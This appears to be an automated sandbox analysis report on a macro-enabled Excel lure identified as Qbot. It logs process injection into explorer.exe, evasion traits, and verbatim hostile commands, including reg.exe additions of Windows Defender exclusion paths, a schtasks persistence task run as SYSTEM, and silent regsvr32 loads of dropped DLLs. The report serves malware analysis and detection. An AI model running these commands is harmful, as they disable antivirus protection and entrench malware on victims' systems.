Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000F1790	9_2_000F1790
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00095000	14_2_00095000
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00096EF0	14_2_00096EF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0009237E	14_2_0009237E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00091790	14_2_00091790

Source: Rebate-690835286-10052021.xls	OLE, VBA macro line: Sub auto_close()
Source: Rebate-690835286-10052021.xls	OLE, VBA macro line: Sub auto_open()
Source: Rebate-690835286-10052021.xls	OLE, VBA macro line: Private Sub saWorkbook_Opensa()

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB0CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,		8_2_6CB0CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB0C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,		8_2_6CB0C702

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Source: Celod.wac2.9.dr	Static PE information: No import functions for PE file found
Source: Celod.wac2.14.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'

Source: Rebate-690835286-10052021.xls

OLE indicator, VBA macros: true

Source: Celod.wac2.14.dr

Static PE information: Data appended to the last section found

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: 44474.9279916667[1].dat.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Celod.wac2.9.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\regsvr32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ....................<.............3.....(.P.............................O.......................................................................	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.%.....N.......(...............	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................4...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Celod.wac2	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Application Data\Microsoft\Forms

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD538.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB0D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

8_2_6CB0D565

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Rebate-690835286-10052021.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB0ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

8_2_6CB0ABE5

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{CA527C6B-71D3-4220-8B46-2F1242F5F8B8}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\Global\{777F4761-072A-4531-A5CA-24A6C4481E01}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{1FDB5674-1064-402F-9161-01DD82884DA4}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CA527C6B-71D3-4220-8B46-2F1242F5F8B8}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{777F4761-072A-4531-A5CA-24A6C4481E01}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1FDB5674-1064-402F-9161-01DD82884DA4}

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB0A55C FindResourceA,

8_2_6CB0A55C

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: c:\level\match\lift_Fit\set\Nation\Heat.pdb source: regsvr32.exe, 00000008.00000002.646420576.000000006CB42000.00000002.00020000.sdmp, explorer.exe, 00000009.00000003.646985681.0000000002760000.00000004.00000001.sdmp, regsvr32.exe, 0000000D.00000002.723731467.000000006CB42000.00000002.00020000.sdmp
Source:	Binary string: amstream.pdb source: explorer.exe, 00000009.00000003.646641483.0000000002760000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000003.723947721.00000000015F0000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB22897 push FFFFFFC9h; retf	8_2_6CB22899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB258D9 push esp; iretd	8_2_6CB258DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB290CF push dword ptr [edi+5B8515F0h]; ret	8_2_6CB291B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2841A push esp; ret	8_2_6CB2841B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB23001 push ebx; iretd	8_2_6CB23014
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB26C06 push edi; ret	8_2_6CB26C07
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2285F pushad ; ret	8_2_6CB2284B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB27DA1 push ebp; ret	8_2_6CB27DC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB27DAE push ebp; ret	8_2_6CB27DC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2393C push ebx; ret	8_2_6CB23974
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2912F push dword ptr [edi+5B8515F0h]; ret	8_2_6CB291B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB21698 push edi; ret	8_2_6CB216A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB22E99 push ebx; iretd	8_2_6CB23014
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB23EFE push 488B8349h; iretd	8_2_6CB23F20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB232C0 push eax; ret	8_2_6CB232C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB24237 push esp; retf	8_2_6CB24285
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB27227 push ds; iretd	8_2_6CB27230
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2320C push es; ret	8_2_6CB2322F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB223BE push ebp; ret	8_2_6CB2242F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2838C pushfd ; iretd	8_2_6CB2838D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB22762 pushad ; ret	8_2_6CB2284B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB21765 push eax; retf	8_2_6CB21766
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB2175A push ebp; ret	8_2_6CB21762
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CC09C21 push dword ptr [esi]; iretd	8_2_6CC09C26
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CC0A23E push eax; iretd	8_2_6CC0A23F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000FA00E push ebx; ret	9_2_000FA00F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000FD485 push FFFFFF8Ah; iretd	9_2_000FD50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000FD4B6 push FFFFFF8Ah; iretd	9_2_000FD50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000F9D5C push cs; iretd	9_2_000F9E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000F9E5E push cs; iretd	9_2_000F9E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000FBB21 push esi; iretd	9_2_000FBB26

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB0DFEF LoadLibraryA,GetProcAddress,

8_2_6CB0DFEF

Source: Celod.wac2.9.dr	Static PE information: real checksum: 0x10c364 should be: 0x10e35b
Source: Celod.wac2.14.dr	Static PE information: real checksum: 0x10c364 should be: 0x5c82

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Celod.wac2
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Celod.wac2	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat			Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Celod.wac2			Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Celod.wac2

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Celod.wac2

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 2556 base: 44102D value: E9 9B 4C CA FF			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 2300 base: 44102D value: E9 9B 4C C4 FF			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2980	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2624	Thread sleep time: -92000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2272	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2276	Thread sleep time: -64000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_9-11339
Source: C:\Windows\SysWOW64\regsvr32.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_8-13823

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44474.9279916667[1].dat

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_8-11416
Source: C:\Windows\SysWOW64\explorer.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_9-10073

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB0D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,

8_2_6CB0D061

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CB0AEF6 FindFirstFileW,FindNextFileW,	8_2_6CB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000EAEF6 FindFirstFileW,FindNextFileW,	9_2_000EAEF6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0008AEF6 FindFirstFileW,FindNextFileW,	14_2_0008AEF6

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB05F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,

8_2_6CB05F63

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB0DFEF LoadLibraryA,GetProcAddress,

8_2_6CB0DFEF

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CC08D44 mov eax, dword ptr fs:[00000030h]	8_2_6CC08D44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CC08C18 mov eax, dword ptr fs:[00000030h]	8_2_6CC08C18
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_6CC08923 push dword ptr fs:[00000030h]	8_2_6CC08923
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_6CC08D44 mov eax, dword ptr fs:[00000030h]	13_2_6CC08D44
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_6CC08C18 mov eax, dword ptr fs:[00000030h]	13_2_6CC08C18
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_6CC08923 push dword ptr fs:[00000030h]	13_2_6CC08923

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 9_2_000E5A54 RtlAddVectoredExceptionHandler,		9_2_000E5A54
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00085A54 RtlAddVectoredExceptionHandler,		14_2_00085A54

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 44102D	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 2556 base: 80000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 2556 base: 44102D value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 2300 base: B0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 2300 base: 44102D value: E9	Jump to behavior

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: Rebate-690835286-10052021.xls, type: SAMPLE

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn tcrzbkfctd /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac2\'' /SC ONCE /Z /ST 22:20 /ET 22:32	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Jjyjdgvcvuvi' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uwwyocree' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac2'	Jump to behavior

Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000009.00000002.906904340.0000000000B10000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 9_2_000E31B5 CreateNamedPipeA,

9_2_000E31B5

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 8_2_6CB097ED GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

8_2_6CB097ED

Source: C:\Windows\SysWOW64\regsvr32.exe

8_2_6CB0D061

Stealing of Sensitive Information:

Yara detected Qbot

Show sources

Source: Yara match	File source: 9.2.explorer.exe.e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.explorer.exe.e0000.0.unpack, type: UNPACKEDPE
